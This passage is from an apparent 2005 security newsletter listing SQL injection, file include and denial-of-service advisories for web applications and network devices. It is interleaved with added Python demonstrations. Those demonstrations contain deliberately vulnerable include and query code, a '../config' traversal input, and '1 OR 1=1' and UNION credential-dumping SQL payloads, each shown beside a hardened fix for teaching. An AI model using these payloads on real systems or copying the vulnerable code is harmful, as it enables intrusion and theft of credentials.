  • Description: DRZES HMS is a web content and customer management application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to such parameters as "plan_id" and "domain". DRZES HMS versions 3.2 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/drzes-hms-32-multiple-vuln.html

  • 05.48.111 - CVE: Not Available
  • Platform: Web Application
  • Title: N-13 News SQL Injection
  • Description: N-13 News is a news management system. It is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "id" parameter of the "index.php" script before using it in an SQL query. N-13 News version 1.2 is affected.
  • Ref: http://www.securityfocus.com/bid/15643/exploit

  • 05.48.112 - CVE: Not Available
  • Platform: Web Application
  • Title: Entergal MX Multiple SQL Injection Vulnerabilities
  • Description: Entergal MX is a professional directory and search engine application that is written in PHP. It is prone to multiple SQL injection vulnerabilities. Entergal MX versions 2.0 and prior are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/entergal-mx-v20-sql-vuln.html

  • 05.48.113 - CVE: Not Available
  • Platform: Web Application
  • Title: BosDates Multiple SQL Injection Vulnerabilities
  • Description: BosDates is a calendar application that is written in PHP. It is prone to multiple SQL injection vulnerabilities due to insufficient sanitization of user-supplied input to the "year" and "category" parameters of the "calendar.php" script. BosDates versions 4.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/bosdates-v40-sql-vuln.html

  • 05.48.114 - CVE: Not Available
  • Platform: Web Application
  • Title: Post Affiliate Pro Index.PHP SQL Injection
  • Description: Post Affiliate Pro is an affiliate management application. Insufficient sanitization of the "sortorder" parameter in the "index.php" script exposes the application to an SQL injection issue. Post Affiliate Pro versions 2.0.4 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15633

  • 05.48.115 - CVE: Not Available
  • Platform: Web Application
  • Title: GhostScripter Amazon Shop Search.PHP SQL Injection
  • Description: GhostScripter Amazon Shop is a shopping cart application. It is prone to an SQL injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the "query" parameter of the "search.php" script before using it in an SQL query. Amazon Shop versions 5.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/amazon-shop-500-xss-vuln.html

  • 05.48.116 - CVE: Not Available
  • Platform: Web Application
  • Title: ltwCalendar Calendar.PHP SQL Injection
  • Description: ltwCalendar is a web-based calendar application written in PHP. ltwCalendar is prone to an SQL injection vulnerability due to improper sanitization of user-supplied input to the "id" parameter of the "calendar.php" script before using it in an SQL query. ltwCalendar versions 4.1.3 and prior are reported to be vulnerable; other versions may also be affected.
  • Ref: http://pridels.blogspot.com/2005/11/codewalkers-ltwcalendar-4x-sql-inj.html

  • 05.48.117 - CVE: CVE-2005-3815
  • Platform: Web Application
  • Title: Orca Knowledgebase Knowledgebase.PHP SQL Injection
  • Description: Orca Knowledgebase is a knowledgebase management application that is written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "qid" parameter of the "knowledgebase.php" script. Orca Knowledgebase version 2.1b is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/orca-knowledgebase-sql-vuln.html

  • 05.48.118 - CVE: Not Available
  • Platform: Web Application
  • Title: Orca Blog Blog.PHP SQL Injection
  • Description: Orca Blog is a free and simple blogging application that is written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "msg" parameter of the "blog.php" script. Orca Blog version 1.3b is vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/orca-blog-sql-inj-vuln.html

  • 05.48.119 - CVE: Not Available
  • Platform: Web Application
  • Title: Orca Ringmaker Ringmaker.PHP SQL Injection
  • Description: Orca Ringmaker is a webring application. Insufficient sanitization of the "start" parameter of the "ringmaker.php" script exposes the application to an SQL injection issue. Orca Ringmaker version 2.3c is affected.
  • Ref: http://www.securityfocus.com/bid/15633

  • 05.48.120 - CVE: Not Available
  • Platform: Web Application
  • Title: FAQ System Multiple SQL Injection
  • Description: FAQ System is a web-based FAQ management application. It is prone to multiple SQL injection issues due to a failure in the application to properly sanitize user-supplied input. An attacker could exploit these issues to compromise the application. Versions 1.1 and prior are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/faq-system-11-sql-inj-vuln.html

  • 05.48.121 - CVE: Not Available
  • Platform: Web Application
  • Title: Survey System Survey.PHP SQL Injection
  • Description: Survey System is a web-based survey application. Insufficient sanitization of the "SURVEY_ID" parameter in the "survey.php" script exposes the application to an SQL injection issue. Survey System versions 1.1 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15641

  • 05.48.122 - CVE: Not Available
  • Platform: Web Application
  • Title: phpAlbum Local File Include
  • Description: phpAlbum is a web-based photo album. Insufficient sanitization of the "cmd" and "var1" parameters in the "main.php" script exposes the application to a local file include issue. phpAlbum versions 0.2.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15651
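The following is an added example, not phpAlbum's code, of the local file include pattern described in the entry above: a request parameter selects which file the script reads, so a traversal value such as "../config" walks out of the intended directory. The directory tree, file names, contents and the page-name rule are constructed for the demonstration; the hardened lookup beside it is one way to close the hole, not the vendor's fix.

```python
"""Added example (not phpAlbum's code): a parameter-selected file include on a
constructed directory tree, with a hardened lookup beside the vulnerable one."""
import os
import re
import tempfile


def build_demo_tree() -> str:
    """Constructed web root: pages/ holds the includable pages, and a config
    file holding a secret sits one directory above them. Returns pages/."""
    root = tempfile.mkdtemp(prefix="lfi_demo_")
    pages = os.path.join(root, "pages")
    os.mkdir(pages)
    with open(os.path.join(pages, "help.txt"), "w") as f:
        f.write("help page")
    with open(os.path.join(root, "config.txt"), "w") as f:
        f.write("db_password=hunter2")  # constructed secret outside pages/
    return pages


def include_vulnerable(pages_dir: str, name: str) -> str:
    """Mirrors the flaw: the parameter is joined onto a path and read with no
    check, the equivalent of include("pages/$cmd.txt") in PHP, so "../config"
    resolves to the file one level up."""
    with open(os.path.join(pages_dir, name + ".txt")) as f:
        return f.read()


# Only plain tokens are acceptable page names (constructed rule for the demo).
_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")


def include_safe(pages_dir: str, name: str) -> str:
    """Hardened: accept only a plain token, then confirm the resolved path is
    still inside pages_dir (catches symlinks and anything the regex missed)."""
    if not _NAME_RE.match(name):
        raise ValueError("invalid page name")
    base = os.path.realpath(pages_dir)
    target = os.path.realpath(os.path.join(base, name + ".txt"))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes the pages directory")
    with open(target) as f:
        return f.read()


def safe_rejects(pages_dir: str, name: str) -> bool:
    """True when the hardened lookup refuses the supplied name."""
    try:
        include_safe(pages_dir, name)
    except (ValueError, PermissionError):
        return True
    return False


if __name__ == "__main__":
    pages = build_demo_tree()
    print(include_vulnerable(pages, "help"))        # intended page
    print(include_vulnerable(pages, "../config"))   # traversal leaks the secret
    print(include_safe(pages, "help"))              # still served
    print(safe_rejects(pages, "../config"))         # True
```

The regex alone would be enough for this tree, but the realpath containment check is kept because it also holds when the allowed names are later read from configuration or when a symlink points outside the directory.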

  • 05.48.123 - CVE: Not Available
  • Platform: Web Application
  • Title: SocketKB Index.PHP SQL Injection
  • Description: SocketKB is a knowledgebase application. Insufficient sanitization of the "node" and "art_id" parameters in the "index.php" script exposes the application to multiple SQL injection issues. SocketKB version 1.1.0 is affected.
  • Ref: http://www.securityfocus.com/bid/15650

  • 05.48.124 - CVE: Not Available
  • Platform: Web Application
  • Title: Softbiz B2B Multiple SQL Injection Vulnerabilities
  • Description: Softbiz B2B Trading Marketplace is a trading site builder application. It is vulnerable to multiple SQL injection issues due to insufficient sanitization of user-supplied input to the "cid" parameter of the "selloffers.php", "buyoffers.php", "products.php" and "profiles.php" scripts. Softbiz B2B Trading Marketplace versions 1.1 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/softbiz-b2b-trading-marketplace-script.html

  • 05.48.125 - CVE: Not Available
  • Platform: Web Application
  • Title: Softbiz FAQ Multiple SQL Injection Vulnerabilities
  • Description: Softbiz FAQ is a web-based FAQ management application. It is prone to multiple SQL injection vulnerabilities. These issues are due to insufficient sanitization of user-supplied input to the "id" parameter of the "faq_qanda.php", "refer_friend.php", "print_article.php" and "add_comment.php" scripts and the "cid" parameter of the "index.php" script. Softbiz FAQ versions 1.1 and prior are reported to be vulnerable; other versions may also be affected.
  • Ref: http://pridels.blogspot.com/2005/11/softbiz-faq-script-multiple-sql-vuln.html

  • 05.48.126 - CVE: Not Available
  • Platform: Web Application
  • Title: Atlantis Knowledge Base Search.PHP SQL Injection
  • Description: Atlantis Knowledge Base is a knowledgebase management application written in PHP. It is prone to an SQL injection vulnerability due to insufficient sanitization of user-supplied input to the "searchStr" parameter of the "search.php" script. Atlantis Knowledge Base versions 3.0 and earlier are reported to be vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/altantisfaq-sql-inj-vuln.html

  • 05.48.127 - CVE: Not Available
  • Platform: Web Application
  • Title: FaqRing Answer.PHP SQL Injection
  • Description: FaqRing is a knowledgebase application written in PHP. It is prone to an SQL injection vulnerability. This issue is due to insufficient sanitization of user-supplied input to the "id" parameter of the "answer.php" script. FaqRing versions 3.0 and prior are reported to be vulnerable; other versions may also be affected.
  • Ref: http://pridels.blogspot.com/2005/11/faqring-30-sql-inj-vuln.html

  • 05.48.128 - CVE: Not Available
  • Platform: Web Application
  • Title: WSN Knowledge Base Multiple SQL Injection
  • Description: WSN Knowledge Base is a knowledgebase application. It is vulnerable to multiple SQL injection issues because the application does not properly sanitize user-supplied input to the "index.php" script. An attacker could exploit these issues to compromise the application. WSN Knowledge Base versions 1.2.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/wsn-knowledge-base-sql-inj-vuln.html

  • 05.48.129 - CVE: Not Available
  • Platform: Web Application
  • Title: O-Kiraku Nikki Nikki.PHP SQL Injection
  • Description: O-Kiraku Nikki is a calendar application. Insufficient sanitization of the "day_id" parameter in the "nikki.php" script exposes the application to an SQL injection issue. O-Kiraku Nikki versions 1.3 and earlier are affected.
  • Ref: http://www.securityfocus.com/bid/15615

  • 05.48.130 - CVE: Not Available
  • Platform: Web Application
  • Title: 88Scripts Event Calendar SQL Injection
  • Description: 88Scripts Event Calendar is a calendar application. It is vulnerable to an SQL injection issue due to insufficient sanitization of user-supplied input to the "m" parameter of the "index.php" script. 88Scripts Event Calendar versions 2.0 and earlier are vulnerable.
  • Ref: http://pridels.blogspot.com/2005/11/88scripts-event-calendar-v20-sql-inj.html
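The following is an added example, not code from ltwCalendar, Orca, Softbiz, WSN, 88Scripts or any other product listed in this section. It shows the pattern the SQL injection entries above share, a request parameter such as "id" concatenated into the query text, against a constructed SQLite database, with the two classic consequences (a boolean condition that returns every row, and a UNION that pulls rows from an unrelated table) and a hardened lookup beside it. The table and column names and the sample rows are invented for the demonstration.

```python
"""Added example, not code from any product listed here: an "id" parameter
pasted into SQL text, exercised against constructed SQLite tables, with a
parameterised lookup beside it."""
import re
import sqlite3
from typing import List, Tuple


def build_demo_db() -> sqlite3.Connection:
    """Constructed sample tables standing in for a small PHP app's schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users  (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO events VALUES (1, 'Board meeting'), (2, 'Release 4.1.3');
        INSERT INTO users  VALUES (1, 'admin', 'hunter2'), (2, 'alice', 's3cret');
        """
    )
    return conn


def fetch_event_vulnerable(conn: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """Mirrors the flaw: the untrusted parameter becomes part of the SQL text,
    the Python equivalent of "... WHERE id = " . $_GET['id'] in PHP."""
    query = "SELECT id, title FROM events WHERE id = " + id_param
    return conn.execute(query).fetchall()


def fetch_event_safe(conn: sqlite3.Connection, id_param: str) -> List[Tuple]:
    """Hardened: require a plain integer, then bind it as a query parameter so
    the value is data to the SQL engine and can never be parsed as syntax."""
    if not re.fullmatch(r"[0-9]{1,10}", id_param):
        raise ValueError("id must be a positive integer")
    return conn.execute(
        "SELECT id, title FROM events WHERE id = ?", (int(id_param),)
    ).fetchall()


def safe_rejects(conn: sqlite3.Connection, id_param: str) -> bool:
    """True when the hardened lookup refuses the input."""
    try:
        fetch_event_safe(conn, id_param)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_demo_db()
    # Legitimate request: one row.
    print(fetch_event_vulnerable(db, "1"))
    # Boolean injection: the WHERE clause is always true, every row comes back.
    print(fetch_event_vulnerable(db, "1 OR 1=1"))
    # UNION injection: rows from an unrelated table (credentials) are appended.
    print(fetch_event_vulnerable(db, "0 UNION SELECT username, password FROM users"))
    # The hardened version serves the first request and refuses the other two.
    print(fetch_event_safe(db, "1"), safe_rejects(db, "1 OR 1=1"))
```

The UNION case is why these advisories say "compromise the application": with the column count guessed, any table the database user can read, typically including the administrator's credentials, is reachable through the vulnerable parameter. Escaping the value (the mysql_real_escape_string approach common in 2005 PHP code) does not help for a numeric parameter that is not quoted in the query, which is why the fix binds the value rather than escaping it.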

  • 05.48.131 - CVE: CVE-2005-3774
  • Platform: Network Device
  • Title: PIX Invalid TCP Checksum DOS
  • Description: Cisco PIX is a firewall appliance. It is vulnerable to a denial of service issue when handling spoofed TCP SYN packets that carry invalid checksums. Cisco PIX versions 7.0 and earlier are vulnerable.
  • Ref: http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038971.html and http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038983.html
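The following is an added example, not Cisco's code, and it makes no claim about how PIX processes packets internally. It shows what "a TCP SYN with an invalid checksum" is by building a minimal SYN segment, computing the checksum over the IPv4 pseudo-header plus segment as RFC 793 specifies, and then running the validation a stateful device should apply before creating connection state: a correct segment passes, a segment whose checksum field was altered fails, and a segment whose source address was spoofed after the checksum was computed also fails because the source address is part of the pseudo-header. Addresses and ports are constructed test values from the RFC 5737 documentation ranges.

```python
"""Added example, not Cisco's code: TCP checksum computation and validation
(RFC 793) over the IPv4 pseudo-header plus segment."""
import socket
import struct

TCP_PROTO = 6


def ones_complement_sum(data: bytes) -> int:
    """16-bit one's complement sum with end-around carry; odd length padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def tcp_checksum(src_ip: str, dst_ip: str, segment: bytes) -> int:
    """Checksum over pseudo-header (src, dst, zero, protocol, TCP length)
    followed by the TCP header and payload."""
    pseudo = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
              + struct.pack("!BBH", 0, TCP_PROTO, len(segment)))
    return (~ones_complement_sum(pseudo + segment)) & 0xFFFF


def build_syn(src_ip: str, src_port: int, dst_ip: str, dst_port: int,
              seq: int = 0, corrupt_checksum: bool = False) -> bytes:
    """Minimal 20-byte SYN with no options; optionally with a wrong checksum,
    the kind of segment the entry above describes."""
    header = struct.pack("!HHIIBBHHH",
                         src_port, dst_port, seq, 0,
                         5 << 4,        # data offset 5 words, reserved bits zero
                         0x02,          # flags: SYN only
                         65535, 0, 0)   # window, checksum placeholder, urgent
    csum = tcp_checksum(src_ip, dst_ip, header)
    if corrupt_checksum:
        csum ^= 0x0001  # any change to the field makes verification fail
    return header[:16] + struct.pack("!H", csum) + header[18:]


def checksum_valid(src_ip: str, dst_ip: str, segment: bytes) -> bool:
    """A correct segment, checksum field included, sums to 0xFFFF, so the
    complemented result is zero. src_ip/dst_ip are the addresses actually
    seen in the IP header, which is what exposes a spoofed source."""
    return tcp_checksum(src_ip, dst_ip, segment) == 0


if __name__ == "__main__":
    SRC, DST = "192.0.2.1", "198.51.100.7"          # constructed addresses
    good = build_syn(SRC, 40000, DST, 80, seq=12345)
    bad = build_syn(SRC, 40000, DST, 80, seq=12345, corrupt_checksum=True)
    print("good SYN valid:", checksum_valid(SRC, DST, good))       # True
    print("corrupted SYN valid:", checksum_valid(SRC, DST, bad))   # False
    print("spoofed-source SYN valid:",
          checksum_valid("203.0.113.9", DST, good))                # False
```

The practical point for anyone filtering or tracking TCP state is the order of operations: the checksum has to be verified against the addresses in the IP header before the SYN is allowed to create an entry, since the end host will silently discard a bad-checksum segment and never complete the handshake that the intermediate device is now waiting for.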

  • 05.48.132 - CVE: CVE-2005-3670
  • Platform: Network Device
  • Title: Multiple Clavister Products IKE Exchange Denial Of Service Vulnerabilities
  • Description: Clavister Firewall and Clavister Security Gateway are commercial network security products. Both are prone to denial of service vulnerabilities. These issues stem from flaws in Clavister's IPsec implementation and may be triggered by malformed IKE traffic.
  • Ref: http://lists.clavister.com/archives/cfw-users/msg01852.html

  • 05.48.133 - CVE: Not Available
  • Platform: Network Device
  • Title: Cisco IOS HTTP Service HTML Injection
  • Description: Cisco IOS includes an HTTP service that provides router management functions; the service has shipped with IOS since release 11.0. The Cisco IOS HTTP service is reportedly prone to an HTML injection vulnerability. This issue may allow the theft of authentication credentials, and an attacker could also exploit it to control how a page is rendered to the user or administrator. This vulnerability has been reported to affect IOS 12.0(2a).
  • Ref: http://www.securityfocus.com/bid/15602

  • 05.48.134 - CVE: CVE-2005-3768
  • Platform: Hardware
  • Title: Symantec Dynamic VPN Services IKE Traffic Denial Of Service
  • Description: Various Symantec products are prone to denial of service attacks. These issues are due to a failure of the product's IPSec implementation to properly handle malformed IKE packets. Successful attacks will cause the ISAKMP service to crash, denying service to dynamic VPN tunnels.
  • Ref: http://securityresponse.symantec.com/avcenter/security/Content/2005.11.21.html

(c) 2005. All rights reserved. The information contained in this newsletter, including any external links, is provided "AS IS," with no express or implied warranty, for informational purposes only. In some cases, copyright for material in this newsletter may be held by a party other than Qualys (as indicated herein) and permission to use such material must be requested from the copyright owner.

==end==

Subscriptions: @RISK is distributed free of charge to people responsible for managing and securing information systems and networks. You may forward this newsletter to others with such responsibility inside or outside your organization.